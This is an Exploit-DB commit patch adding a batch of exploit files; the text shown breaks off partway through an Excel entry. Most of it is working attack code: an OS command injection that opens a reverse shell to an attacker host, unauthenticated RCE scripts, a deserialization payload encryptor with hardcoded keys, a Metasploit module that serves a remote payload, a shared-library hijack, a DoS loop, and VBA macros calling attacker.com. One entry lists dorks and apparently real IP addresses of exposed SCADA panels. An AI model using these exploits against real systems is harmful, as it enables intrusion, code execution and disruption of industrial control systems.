From 85954a8fad0cb969fa9512f3b267481c711573fd Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sun, 9 Apr 2023 00:16:30 +0000 Subject: [PATCH] DB: 2023-04-09 34 changes to exploits/shellcodes/ghdb ENTAB ERP 1.0 - Username PII leak ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) FortiRecorder 6.4.3 - Denial of Service Schneider Electric v1.0 - Directory traversal & Broken Authentication Altenergy Power Control Software C1.2.5 - OS command injection Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated) Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu) Lucee Scheduled Job v1.0 - Command Execution Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) Adobe Connect 11.4.5 - Local File Disclosure Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS) Suprema BioStar 2 v2.8.16 - SQL Injection Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS) dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated) GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure Icinga Web 2.10 - Arbitrary File Disclosure Joomla! v4.2.8 - Unauthenticated information disclosure Medicine Tracker System v1.0 - Sql Injection Online Appointment System V1.0 - Cross-Site Scripting (XSS) Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE) pfsenseCE v2.6.0 - Anti-brute force protection bypass Restaurant Management System 1.0 - SQL Injection WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS) X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated) X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated) Microsoft Windows 11 - 'cmd.exe' Denial of Service ActFax 10.10 - Unquoted Path Services ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation --- exploits/asp/webapps/51335.txt | 28 +++ exploits/aspx/webapps/51118.txt | 4 +- exploits/cgi/webapps/51347.txt | 20 ++ exploits/hardware/dos/51326.py | 67 ++++++ exploits/hardware/remote/51320.txt | 38 ++++ exploits/hardware/webapps/51325.py | 53 +++++ exploits/java/webapps/51339.java | 60 +++++ exploits/jsp/webapps/51350.txt | 28 +++ exploits/linux/local/51331.txt | 58 +++++ exploits/multiple/local/51333.rb | 331 ++++++++++++++++++++++++++++ exploits/multiple/remote/51328.txt | 58 +++++ exploits/multiple/webapps/51327.txt | 41 ++++ exploits/multiple/webapps/51340.txt | 97 ++++++++ exploits/multiple/webapps/51342.txt | 46 ++++ exploits/multiple/webapps/51343.txt | 44 ++++ exploits/php/webapps/51231.txt | 32 --- exploits/php/webapps/51329.py | 68 ++++++ exploits/php/webapps/51330.txt | 17 ++ exploits/php/webapps/51334.py | 132 +++++++++++ exploits/php/webapps/51337.txt | 40 ++++ exploits/php/webapps/51338.txt | 126 +++++++++++ exploits/php/webapps/51344.txt | 57 +++++ exploits/php/webapps/51345.txt | 46 ++++ exploits/php/webapps/51346.txt | 45 ++++ exploits/php/webapps/51349.txt | 46 ++++ exploits/php/webapps/51352.py | 95 ++++++++ exploits/php/webapps/51353.txt | 50 +++++ exploits/windows/dos/51348.txt | 38 ++++ exploits/windows/local/51332.txt | 44 ++++ exploits/windows/local/51336.txt | 285 ++++++++++++++++++++++++ exploits/windows/local/51341.txt | 140 ++++++++++++ exploits/windows/local/51351.txt | 23 ++ files_exploits.csv | 33 ++- 33 files changed, 2254 insertions(+), 36 deletions(-) create mode 100644 exploits/asp/webapps/51335.txt create mode 100644 exploits/cgi/webapps/51347.txt create mode 100755 exploits/hardware/dos/51326.py create mode 100644 exploits/hardware/remote/51320.txt create mode 100755 exploits/hardware/webapps/51325.py create mode 100644 exploits/java/webapps/51339.java create mode 100644 exploits/jsp/webapps/51350.txt create mode 100644 exploits/linux/local/51331.txt create mode 100755 exploits/multiple/local/51333.rb create mode 100644 exploits/multiple/remote/51328.txt create mode 100644 exploits/multiple/webapps/51327.txt create mode 100644 exploits/multiple/webapps/51340.txt create mode 100644 exploits/multiple/webapps/51342.txt create mode 100644 exploits/multiple/webapps/51343.txt delete mode 100644 exploits/php/webapps/51231.txt create mode 100755 exploits/php/webapps/51329.py create mode 100644 exploits/php/webapps/51330.txt create mode 100755 exploits/php/webapps/51334.py create mode 100644 exploits/php/webapps/51337.txt create mode 100644 exploits/php/webapps/51338.txt create mode 100644 exploits/php/webapps/51344.txt create mode 100644 exploits/php/webapps/51345.txt create mode 100644 exploits/php/webapps/51346.txt create mode 100644 exploits/php/webapps/51349.txt create mode 100755 exploits/php/webapps/51352.py create mode 100644 exploits/php/webapps/51353.txt create mode 100644 exploits/windows/dos/51348.txt create mode 100644 exploits/windows/local/51332.txt create mode 100644 exploits/windows/local/51336.txt create mode 100644 exploits/windows/local/51341.txt create mode 100644 exploits/windows/local/51351.txt diff --git a/exploits/asp/webapps/51335.txt b/exploits/asp/webapps/51335.txt new file mode 100644 index 000000000..faa4bbbd9 --- /dev/null +++ b/exploits/asp/webapps/51335.txt @@ -0,0 +1,28 @@ +Exploit Title: ENTAB ERP 1.0 - Username PII leak +Date: 17.05.2022 +Exploit Author: Deb Prasad Banerjee +Vendor Homepage: https://www.entab.in +Version: Entab ERP 1.0 +Tested on: Windows IIS +CVE: CVE-2022-30076 + +Vulnerability Name: Broken Access control via Rate Limits + +Description: +In the entab software in fapscampuscare.in, there is a login portal with a +UserId field. An authenticated user would enter and get their name as well +as other services. However, there should be a rate limit in place, which is +not present. As a result, a hacker could bypass the system and obtain other +usernames via broken access control. This enables a threat actor to +obain the complete full name and user ID of the person. + +POC: +1. Go to fapscampuscare.in or any entab hosted software and find the entab +software. +2. Use a proxy to intercept the request. +3. Since it's a student login, try a random UserId (e.g., s11111). +4. Intercept the request using Burp Suite and send it to the Intruder. +5. Select payloads from number 100000-20000, and turn off URL encoding on +the UserId parameter. +6. Start the attack and sort by length to obtain the username and full name +of other users. \ No newline at end of file diff --git a/exploits/aspx/webapps/51118.txt b/exploits/aspx/webapps/51118.txt index 1a3138d00..18081e32b 100644 --- a/exploits/aspx/webapps/51118.txt +++ b/exploits/aspx/webapps/51118.txt @@ -19,5 +19,5 @@ POBatch WaitDuration #Final URLs -http://20.36.214.225:81/ProcessWait.aspx?POBatch=&WaitDuration=3 -http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration= \ No newline at end of file +http://localost:81/ProcessWait.aspx?POBatch=&WaitDuration=3 +http://localost:81/ProcessWait.aspx?POBatch=test&WaitDuration= \ No newline at end of file diff --git a/exploits/cgi/webapps/51347.txt b/exploits/cgi/webapps/51347.txt new file mode 100644 index 000000000..019679d18 --- /dev/null +++ b/exploits/cgi/webapps/51347.txt @@ -0,0 +1,20 @@ +# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) +# Date: 2023-03-30 +# CVE: CVE-2023-26692 +# Exploit Author: Abdulaziz Saad (@b4zb0z) +# Vendor Homepage: https://www.zcbs.nl +# Version: 4.14k +# Tested on: LAMP, Ubuntu +# Google Dork: inurl:objecten.pl?ident=3D + +--- + +[#] Vulnerability : + +`$_GET['ident']` + + +[#] Exploitation : + +`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror= +=3Dalert(%22XSS%22)%3E` \ No newline at end of file diff --git a/exploits/hardware/dos/51326.py b/exploits/hardware/dos/51326.py new file mode 100755 index 000000000..901d8c32a --- /dev/null +++ b/exploits/hardware/dos/51326.py @@ -0,0 +1,67 @@ +# Exploit Title: FortiRecorder 6.4.3 - Denial of Service +# Google Dork: N/A +# Date: 13/03/2023 +# Exploit Author: Mohammed Adel +# Vendor Homepage: https://www.fortinet.com/ +# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder +# Version: 6.4.3 and below && 6.0.11 to 6.0.0 +# Tested on: Kali Linux +# CVE : CVE-2022-41333 +# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388 +# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5 + +import requests +import warnings +import sys +from urllib.parse import unquote +warnings.filterwarnings('ignore', message='Unverified HTTPS request') + +def POST(target, req_type, payload): + print("[+] Target : "+target) + print("[+] Request Type: POST") + print("[+] Payload : " +payload) + post_url = target+"/module/admin.fe" + post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"} + url_decoder = unquote(payload) + full_payload = "fewReq="+url_decoder + while True: + r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False) + if "Failed: Access denied" in r.text: + print("[+] Payload Sent.") + else: + print("[!] Something went wrong!") + print(r.text) + +def GET(target, req_type, payload): + print("[+] Target : "+target) + print("[+] Request Type: GET") + print("[+] Payload : " +payload) + while True: + url = target+"/module/admin.fe?fewReq="+payload + headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"} + r = requests.get(url, headers=headers, verify=False) + if "Failed: Access denied" in r.text: + print("[+] Payload Sent.") + else: + print("[!] Something went wrong!") + print(r.text) + + +print("[+] Starting ..") +target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com +req_type = str((sys.argv[2])) # POST or GET +payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi + + +if "post" in req_type.lower(): + if "https" in target.lower() or "http" in target.lower(): + POST(target, req_type, payload) + else: + print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]") +elif "get" in req_type.lower(): + if "https" in target.lower() or "http" in target.lower(): + GET(target, req_type, payload) + else: + print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]") +else: + print("[!] Invalid Request Type.") \ No newline at end of file diff --git a/exploits/hardware/remote/51320.txt b/exploits/hardware/remote/51320.txt new file mode 100644 index 000000000..64a1db3f8 --- /dev/null +++ b/exploits/hardware/remote/51320.txt @@ -0,0 +1,38 @@ +# Exploit Title: Schneider Electric v1.0 - Directory traversal & Broken Authentication +# Google Dork: inurl:/scada-vis +# Date: 3/11/2023 +# Exploit Author: parsa rezaie khiabanloo +# Vendor Homepage: https://www.se.com/ +# Version: all-versions +# Tested on: Windows/Linux/Android + +# Attacker can using these dorks and access to the panel without password + +inurl:/cgi-bin/scada-vis/ + +inurl:/scada-vis/schedulers + +inurl:/cgi-bin/scada-vis/index.cgi + +inurl:/scada-vis + +inurl:/cgi-bin/scada-vis/touch.html + +POC : + +http://185.73.103.144:8080/cgi-bin/scada-vis/index.cgi + +http://185.73.103.38:8080/cgi-bin/scada-vis/touch.html + +http://88.213.153.98/cgi-bin/scada-vis/schedulers.cgi + + +# Attacker can these this dork for bruteforce the panel + +inurl:/scada-vis/pin?return=index + +POC : + +http://143.176.129.1/scada-vis/pin?return=index + +http://62.163.74.206/scada-vis/pin?return=touch \ No newline at end of file diff --git a/exploits/hardware/webapps/51325.py b/exploits/hardware/webapps/51325.py new file mode 100755 index 000000000..0faf0af47 --- /dev/null +++ b/exploits/hardware/webapps/51325.py @@ -0,0 +1,53 @@ +# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection +# Google Dork: intitle:"Altenergy Power Control Software" +# Date: 15/3/2023 +# Exploit Author: Ahmed Alroky +# Vendor Homepage: https://apsystems.com/ +# Version: C1.2.5 +# Tested on: Windows 10 +# CVE : CVE-2023-28343 + + +import requests +import argparse + +def exploit(target,attacker,port): + url = f'{target}/index.php/management/set_timezone' + + headers = { + 'Accept': 'application/json, text/javascript, */*; q=0.01', + 'X-Requested-With': 'XMLHttpRequest', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', + 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', + 'Origin': f'{target}', + 'Referer': f'{target}/index.php/management/datetime', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'en-US,en;q=0.9', + 'Connection': 'close' + } + + print(f"Sending Request") + data = { + 'timezone': f'`mknod /tmp/pipe p;/bin/sh 0/tmp/pipe`' + } + + response = requests.post(url, headers=headers, data=data) + # print(response.text) +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='Parse target, attacker, +and port.',) + + parser.add_argument('--target','-t', type=str, help='The target IP +address or hostname. example : http://192.168.254') + parser.add_argument('--attacker','-a', type=str, help='The attacker IP +address or hostname.') + parser.add_argument('--port', '-p',type=int, help='Listening port') + + args = parser.parse_args() + try: + exploit(args.target,args.attacker,args.port) + except: + parser.print_help() + print("Exploit done") \ No newline at end of file diff --git a/exploits/java/webapps/51339.java b/exploits/java/webapps/51339.java new file mode 100644 index 000000000..fbe923119 --- /dev/null +++ b/exploits/java/webapps/51339.java @@ -0,0 +1,60 @@ +// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) +// Google Dork: title:"GoAnywhere" +// Date: 3/26/2023 +// Exploit Author: Youssef Muhammad +// Vendor Homepage: https://www.goanywhere.com/ +// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0 +// Version: > 7.1.1 for windows / > 7.0.3 for Linux +// Tested on: Windows, Linux +// CVE : CVE-2023-0669 +// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution + +import java.util.Base64; +import javax.crypto.Cipher; +import java.nio.charset.StandardCharsets; +import javax.crypto.SecretKeyFactory; +import javax.crypto.spec.PBEKeySpec; +import javax.crypto.spec.IvParameterSpec; +import javax.crypto.spec.SecretKeySpec; +import java.nio.file.Files; +import java.nio.file.Paths; +public class CVE_2023_0669_helper { + static String ALGORITHM = "AES/CBC/PKCS5Padding"; + static byte[] KEY = new byte[30]; + static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8); + public static void main(String[] args) throws Exception { + if (args.length != 2) { + System.out.println("Usage: java CVE_2023_0669_helper "); + System.exit(1); + } + String filePath = args[0]; + String version = args[1]; + byte[] fileContent = Files.readAllBytes(Paths.get(filePath)); + String encryptedContent = encrypt(fileContent, version); + System.out.println(encryptedContent); + } + public static String encrypt(byte[] data, String version) throws Exception { + Cipher cipher = Cipher.getInstance(ALGORITHM); + KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue(); + SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES"); + IvParameterSpec ivSpec = new IvParameterSpec(IV); + cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec); + byte[] encryptedObject = cipher.doFinal(data); + String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject); + String v = (version.equals("2")) ? "$2" : ""; + bundle += v; + return bundle; + } + private static byte[] getInitializationValue() throws Exception { + // Version 1 Encryption + String param1 = "go@nywhereLicenseP@$$wrd"; + byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85}; + return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded(); + } + private static byte[] getInitializationValueV2() throws Exception { + // Version 2 Encryption + String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R"; + byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73}; + return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded(); + } +} \ No newline at end of file diff --git a/exploits/jsp/webapps/51350.txt b/exploits/jsp/webapps/51350.txt new file mode 100644 index 000000000..6884aa955 --- /dev/null +++ b/exploits/jsp/webapps/51350.txt @@ -0,0 +1,28 @@ +# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated) +# Author: dwbzn +# Date: 2022-04-04 +# Vendor: https://www.hitachivantara.com/ +# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html +# Version: Pentaho BA Server 9.3.0.0-428 +# CVE: CVE-2022-43769, CVE-2022-43939 +# Tested on: Windows 11 +# Credits: https://research.aurainfosec.io/pentest/pentah0wnage +# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe). + +# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage) +import requests +import argparse + +parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI') +parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho') +parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False) +args = parser.parse_args() + +url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a" + +print ("running...") +r = requests.get(url) +if r.text == 'false': + print ("command should've executed! nice.") +else: + print ("didn't work. sadge...") \ No newline at end of file diff --git a/exploits/linux/local/51331.txt b/exploits/linux/local/51331.txt new file mode 100644 index 000000000..afa5cddec --- /dev/null +++ b/exploits/linux/local/51331.txt @@ -0,0 +1,58 @@ +#Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu) +Product: Google Chrome +Discovered by: Rafay Baloch and Muhammad Samak +#Version: 109.0.5414.74 +#Impact: Moderate +#Company: Cyber Citadel +#Website: https://www.cybercitadel.com +#Tested-on : Ubuntu 22.04.1 + +*Description* + +Google chrome attempts to load the 'libssckbi.so' file from a user-writable location. +PATH: /home/$username/.pki/nssdb/libnssckbi.so +Since the Shared Library 'ibnssckbi.so' specified path is writeable. +It is possible to achieve the Code Execution by placing the malicious file with +the name `libnssckbi.so` in the specified path. + + + +*exploit* + +Following is the POC that could be used to reproduce the issue: + +echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..." +echo "[*] Checking /.pki/nssdb PATH" +if [ -d "/home/haalim/.pki/nssdb" ] +then + + echo "[+] Directory Exists..." + if [ -w "/home/haalim/.pki/nssdb" ] + then + echo "[+] Directory is writable..." + + echo "[+] Directory is writable..." + echo "[+] Generating malicious File libnssckbi.so ..." + echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c + echo "#include " >> /home/haalim/.pki/nssdb/exploit.c + echo "#include " >> /home/haalim/.pki/nssdb/exploit.c + echo "#include " >> /home/haalim/.pki/nssdb/exploit.c + echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c + echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c + echo "}" >> /home/haalim/.pki/nssdb/exploit.c + gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o + gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o + + + fi + +fi + +Upon closing the browser windows, the application executes the malicious code + + +*Impact* + +The attacker can use this behavior to bypass the application whitelisting rules. +This behavior can also lead to DoS attacks. +An attacker can trick a victim into supplying credentials by creating a fake prompt. \ No newline at end of file diff --git a/exploits/multiple/local/51333.rb b/exploits/multiple/local/51333.rb new file mode 100755 index 000000000..b8bee24bd --- /dev/null +++ b/exploits/multiple/local/51333.rb @@ -0,0 +1,331 @@ +# Exploit Title: Lucee Scheduled Job v1.0 - Command Execution +# Date: 3-23-2012 +# Exploit Author: Alexander Philiotis +# Vendor Homepage: https://www.lucee.org/ +# Software Link: https://download.lucee.org/ +# Version: All versions with scheduled jobs enabled +# Tested on: Linux - Debian, Lubuntu & Windows 10 +# Ref : https://www.synercomm.com/blog/scheduled-tasks-with-lucee-abusing-built-in-functionality-for-command-execution/ + +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::Retry + include Msf::Exploit::FileDropper + require 'base64' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Lucee Authenticated Scheduled Job Code Execution', + 'Description' => %q{ + This module can be used to execute a payload on Lucee servers that have an exposed + administrative web interface. It's possible for an administrator to create a + scheduled job that queries a remote ColdFusion file, which is then downloaded and executed + when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed, + the payload will run as the user specified during the Lucee installation. On Windows, this is a service account; + on Linux, it is either the root user or lucee. + }, + 'Targets' => [ + [ + 'Windows Command', + { + 'Platform' => 'win', + 'Arch' => ARCH_CMD, + 'Type' => :windows_cmd + } + ], + [ + 'Unix Command', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd + } + ] + ], + 'Author' => 'Alexander Philiotis', # aphiliotis@synercomm.com + 'License' => MSF_LICENSE, + 'References' => [ + # This abuses the functionality inherent to the Lucee platform and + # thus is not related to any CVEs. + + # Lucee Docs + ['URL', 'https://docs.lucee.org/'], + + # cfexecute & cfscript documentation + ['URL', 'https://docs.lucee.org/reference/tags/execute.html'], + ['URL', 'https://docs.lucee.org/reference/tags/script.html'], + ], + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ + # /opt/lucee/server/lucee-server/context/logs/application.log + # /opt/lucee/web/logs/exception.log + IOC_IN_LOGS, + ARTIFACTS_ON_DISK, + # ColdFusion files located at the webroot of the Lucee server + # C:/lucee/tomcat/webapps/ROOT/ by default on Windows + # /opt/lucee/tomcat/webapps/ROOT/ by default on Linux + ] + }, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'DisclosureDate' => '2023-02-10' + ) + ) + + register_options( + [ + Opt::RPORT(8888), + OptString.new('PASSWORD', [false, 'The password for the administrative interface']), + OptString.new('TARGETURI', [true, 'The path to the admin interface.', '/lucee/admin/web.cfm']), + OptInt.new('PAYLOAD_DEPLOY_TIMEOUT', [false, 'Time in seconds to wait for access to the payload', 20]), + ] + ) + deregister_options('URIPATH') + end + + def exploit + payload_base = rand_text_alphanumeric(8..16) + authenticate + + start_service({ + 'Uri' => { + 'Proc' => proc do |cli, req| + print_status("Payload request received for #{req.uri} from #{cli.peerhost}") + send_response(cli, cfm_stub) + end, + 'Path' => '/' + payload_base + '.cfm' + } + }) + + # + # Create the scheduled job + # + create_job(payload_base) + + # + # Execute the scheduled job and attempt to send a GET request to it. + # + execute_job(payload_base) + print_good('Exploit completed.') + + # + # Removes the scheduled job + # + print_status('Removing scheduled job ' + payload_base) + cleanup_request = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_get' => { + 'action' => 'services.schedule' + }, + 'vars_post' => { + 'row_1' => '1', + 'name_1' => payload_base.to_s, + 'mainAction' => 'delete' + } + }) + if cleanup_request && cleanup_request.code == 302 + print_good('Scheduled job removed.') + else + print_bad('Failed to remove scheduled job.') + end + end + + def authenticate + auth = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'keep_cookies' => true, + 'vars_post' => { + 'login_passwordweb' => datastore['PASSWORD'], + 'lang' => 'en', + 'rememberMe' => 's', + 'submit' => 'submit' + } + }) + + unless auth + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + + unless auth.code == 200 && auth.body.include?('nav_Security') + fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.') + end + + print_good('Authenticated successfully') + end + + def create_job(payload_base) + create_job = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'keep_cookies' => true, + 'vars_get' => { + 'action' => 'services.schedule', + 'action2' => 'create' + }, + 'vars_post' => { + 'name' => payload_base, + 'url' => get_uri.to_s, + 'interval' => '3600', + 'start_day' => '01', + 'start_month' => '02', + 'start_year' => '2023', + 'start_hour' => '00', + 'start_minute' => '00', + 'start_second' => '00', + 'run' => 'create' + } + }) + + fail_with(Failure::Unreachable, 'Could not connect to the web service') if create_job.nil? + fail_with(Failure::UnexpectedReply, 'Unable to create job') unless create_job.code == 302 + + print_good('Job ' + payload_base + ' created successfully') + job_file_path = file_path = webroot + fail_with(Failure::UnexpectedReply, 'Could not identify the web root') if job_file_path.blank? + + case target['Type'] + when :unix_cmd + file_path << '/' + job_file_path = "#{job_file_path.gsub('/', '//')}//" + when :windows_cmd + file_path << '\\' + job_file_path = "#{job_file_path.gsub('\\', '\\\\')}\\" + end + update_job = send_request_cgi({ + 'method' => 'POST', + 'uri' => target_uri.path, + 'keep_cookies' => true, + 'vars_get' => { + 'action' => 'services.schedule', + 'action2' => 'edit', + 'task' => create_job.headers['location'].split('=')[-1] + }, + 'vars_post' => { + 'name' => payload_base, + 'url' => get_uri.to_s, + 'port' => datastore['SRVPORT'], + 'timeout' => '50', + 'username' => '', + 'password' => '', + 'proxyserver' => '', + 'proxyport' => '', + 'proxyuser' => '', + 'proxypassword' => '', + 'publish' => 'true', + 'file' => "#{job_file_path}#{payload_base}.cfm", + 'start_day' => '01', + 'start_month' => '02', + 'start_year' => '2023', + 'start_hour' => '00', + 'start_minute' => '00', + 'start_second' => '00', + 'end_day' => '', + 'end_month' => '', + 'end_year' => '', + 'end_hour' => '', + 'end_minute' => '', + 'end_second' => '', + 'interval_hour' => '1', + 'interval_minute' => '0', + 'interval_second' => '0', + 'run' => 'update' + } + }) + + fail_with(Failure::Unreachable, 'Could not connect to the web service') if update_job.nil? + fail_with(Failure::UnexpectedReply, 'Unable to update job') unless update_job.code == 302 || update_job.code == 200 + register_files_for_cleanup("#{file_path}#{payload_base}.cfm") + print_good('Job ' + payload_base + ' updated successfully') + end + + def execute_job(payload_base) + print_status("Executing scheduled job: #{payload_base}") + job_execution = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_get' => { + 'action' => 'services.schedule' + }, + 'vars_post' => { + 'row_1' => '1', + 'name_1' => payload_base, + 'mainAction' => 'execute' + } + + }) + + fail_with(Failure::Unreachable, 'Could not connect to the web service') if job_execution.nil? + fail_with(Failure::Unknown, 'Unable to execute job') unless job_execution.code == 302 || job_execution.code == 200 + + print_good('Job ' + payload_base + ' executed successfully') + + payload_response = nil + retry_until_truthy(timeout: datastore['PAYLOAD_DEPLOY_TIMEOUT']) do + print_status('Attempting to access payload...') + payload_response = send_request_cgi( + 'uri' => '/' + payload_base + '.cfm', + 'method' => 'GET' + ) + payload_response.nil? || (payload_response && payload_response.code == 200 && payload_response.body.exclude?('Error')) || (payload_response.code == 500) + end + + # Unix systems tend to return a 500 response code when executing a shell. Windows tends to return a nil response, hence the check for both. + fail_with(Failure::Unknown, 'Unable to execute payload') unless payload_response.nil? || payload_response.code == 200 || payload_response.code == 500 + + if payload_response.nil? + print_status('No response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!')) + elsif payload_response.code == 200 + print_good('Received 200 response from ' + payload_base + '.cfm') + output = payload_response.body.strip + if output.include?("\n") + print_good('Output:') + print_line(output) + elsif output.present? + print_good('Output: ' + output) + end + elsif payload_response.code == 500 + print_status('Received 500 response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!')) + end + end + + def webroot + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path) + }) + return nil unless res + + res.get_html_document.at('[text()*="Webroot"]')&.next&.next&.text + end + + def cfm_stub + case target['Type'] + when :windows_cmd + <<~CFM.gsub(/^\s+/, '').tr("\n", '') + + cfexecute(name="cmd.exe", arguments="/c " & toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64")),timeout=5); + + CFM + when :unix_cmd + <<~CFM.gsub(/^\s+/, '').tr("\n", '') + + cfexecute(name="/bin/bash", arguments=["-c", toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64"))],timeout=5); + + CFM + end + end +end \ No newline at end of file diff --git a/exploits/multiple/remote/51328.txt b/exploits/multiple/remote/51328.txt new file mode 100644 index 000000000..b64df1af2 --- /dev/null +++ b/exploits/multiple/remote/51328.txt @@ -0,0 +1,58 @@ +## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) +## Exploit Author: nu11secur1ty +## Date: 03.16.2023 +## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel +## Software: https://www.microsoft.com/en-us/microsoft-365/excel +## Reference: https://www.invicti.com/learn/remote-code-execution-rce/ +## CVE ID: CVE-2023-23399 + +## Description: +The malicious user can exploit the victim's PC remotely. +For example, when the score indicates that the Attack Vector is Local +and User Interaction is Required, this could describe an exploit in +which an attacker, through social engineering, convinces a victim to +download and open a specially crafted file from a website which leads +to a local attack on their computer. + +STATUS: HIGH Vulnerability + +[+]Exploit0: +``` +Sub Check_your_salaries() +CreateObject("Shell.Application").ShellExecute +"microsoft-edge:https://attacker.com" +End Sub +``` +[+]Exploit1: +``` +Sub cmd() +Dim Program As String +Dim TaskID As Double +On Error Resume Next +Program = "cmd.exe" +TaskID = Shell(Program, 1) +If Err <> 0 Then +MsgBox "Can't start " & Program +End If +End Sub +``` + +## Reproduce: 